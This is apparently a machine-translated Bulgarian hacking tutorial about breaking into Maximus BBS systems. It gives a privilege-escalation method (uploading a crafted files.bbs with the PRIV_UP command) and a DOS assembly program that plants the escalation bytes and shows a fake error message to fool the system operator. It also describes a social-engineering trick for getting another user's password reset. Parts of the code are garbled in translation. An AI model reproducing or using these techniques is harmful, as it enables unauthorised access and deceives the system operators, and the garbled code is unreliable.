BBS и FTN мрежи
Има голям брой програми, предназначени да създават и поддържат BBS. Нека разгледаме най-популярния сред тях - Maximus.
Неоторизиран достъп до BBS, получаване на достъп до затворени зони, унищожаване на информация - такива задачи се задават от кракера.
Има така наречените списъци с файлове, които съдържат информация за ресурсите, достъпни за потребителите на този BBS. По правило такива списъци има във всяка специална тематична конференция. Потребителите могат да копират всеки файл от там или да оставят свои. В Maximus списъкът с всички налични файлове в конференцията е файл с име files.bbs.
Специално за тази програма е създаден език за програмиране, подобен на C и Pascal. Можете да пишете свои собствени програми върху него.
под BBS. Това вероятно е причината повечето системни оператори да предпочитат да използват Maximus. След компилиране на написаната програма , тя може да бъде добавена към общата база данни Maximus и ще започне да работи.
Всяка компилирана програма придобива определена файлова маска . Компилираната MEC програма има маска *. bbs, подобно на маската на списъка с файлове. Обикновено тези файлове съдържат списъци, но ако в кода има сервизни команди, те ще бъдат изпълнени. Това е, което нападателят може да използва.
Maximus има два езика: MEC и MEX. Езикът на MEC е много прост, всеки може да го разбере. Позволява ви да работите с различни лични данни, скрийнсейвъри на BBS, потребителска база. Системният оператор трябва да знае този език.
Използвайки командата "PRIV_UP" на езика MEC, системният оператор може без специалниусилия за подобряване на нивото на потребителя, при условие че последният ще пише и изпраща файлове на станцията. С повишаване на нивото потребителят получава допълнителни възможности (увеличава времето за работа, количеството информация, която може да бъде получена от BBS). Ето какво може да направи един хакер. Всичко, което трябва да направи, е да намери BBS, работещ с Maximus, който има много файлови конференции. В този случай една от тези конференции трябва да е празна (т.е. не трябва да съдържа файла files.bbs, съдържащ наличните файлове в тази конференция). Така остава само едно условие за проверка - ако всички копирани файлове на BBS са поставени в конференцията, която е избрана последния път, тогава такъв BBS може да бъде хакнат без много усилия. Единственото нещо, което остава на хакера, е да създаде файла files.tes, да напише командата PRIV_UP в него, след което да компилира този файл с компилатора MESSA (сега той ще се нарича files.bbs) и да го изпрати на BBS. Отсега нататък хакерът може да повиши нивото си на достъп, като гледа тази конференция, докато достигне нивото на системния станционен оператор. След това компютърът ще бъде изцяло на негово разположение.
Ако нямате под ръка компилатора Messa, можете също да създадете files.bbs ръчно. За да направите това, трябва да създадете файл files.bbs и след това да въведете командата level up в него - на езика Maximus това са само три знака (кодът на първия е 23h, следващите два са символи pU).
приемем cs:cseg, ds:cseg cseg сегмент org 100h start:
.Намерете файла FILES.BBS mov ah,4Eh mov dx.offset fname mov cx,20h int 21 h
;Ако файлът липсва, тогава излезте от програмата - ;тук няма какво да се коригира jc изход
;0open намерен файл mov ax,3D02h mov dx,9Eh int 21 h jc изход
-.Задайте указателя за четене/запис в края на файла mov bx.ax mov ax,4202h xor cx.cx xor dx,dx int 21h
Записваме три байта във файла mov ah,40h mov cx,3
mov dx.offset байтове int 21 h jc изход
;3затваряне на файл mov ah,3Eh int 21 h
[Подайте съобщение за грешка и излезте към DOS. Въпросът е , че завършената програма не трябва да предизвиква подозрения у системния оператор. Целта е да се принуди системният оператор
мисля, че файлът е повреден. Може би той ще признае, че понякога ;възникват грешки при прехвърляне на файлове и следователно файлът ;може да стане неизползваем изход:
[Изпратете съобщение за грешка mov ah,09h
mov dx, съобщение за отместване int 21 h
; Изход към DOS mov ah,4Ch int 21 h
;Mycop - специално за опаковане ;файл с PKLITE Garbage db 12000 dup ("A")
;Име на файл "FILES.BBS" fname db "files.bbs",0
;Съобщение за грешка съобщение db "CRC файл грешка", 13,10,"$"
.Байтове за запис байтове db 23h,"pU" cseg завършва край начало
tasm.exe vzlom.asm tlink.exe vzlom.obj /t pklite vzlom.com
Получаване на BBS парола без хакване
Може да се предложи още един метод за проникване - методът "забравяне на паролата". Целият трик е, че при влизане в системата се посочва името на всеки потребител на този BBS, чиято парола, разбира се, не е известна. След неуспешни опити за въвеждане на парола (не се опитвайте да я вземете, по-добре е да се преструвате, че паролата е забравена, като въведете различни думи, като Sprite, Cola и т.н.), трябва да напишете писмо до системния оператор с молба да смените „забравената“ парола с друга. Укази- измисляме нова парола, след което измисляме сълзлива история за някакъв някой хакер, който уж е взел паролата ни на друг BBS или в Интернет като цяло, поради което трябва да използваме различни пароли на всички системи. Ако системният оператор не е много опитен, след като изслуша такава ужасна история, той определено ще влезе в положението на нещастен и ще изпълни искането си - смени текущата парола на предложената . Освен това - пълна свобода на действие. Работимостта на този метод зависи от това колко опитен е операторът, както и от това дали измислената история е убедителна. След като го прочете, системният оператор дори не трябва да предполага, че е измамен.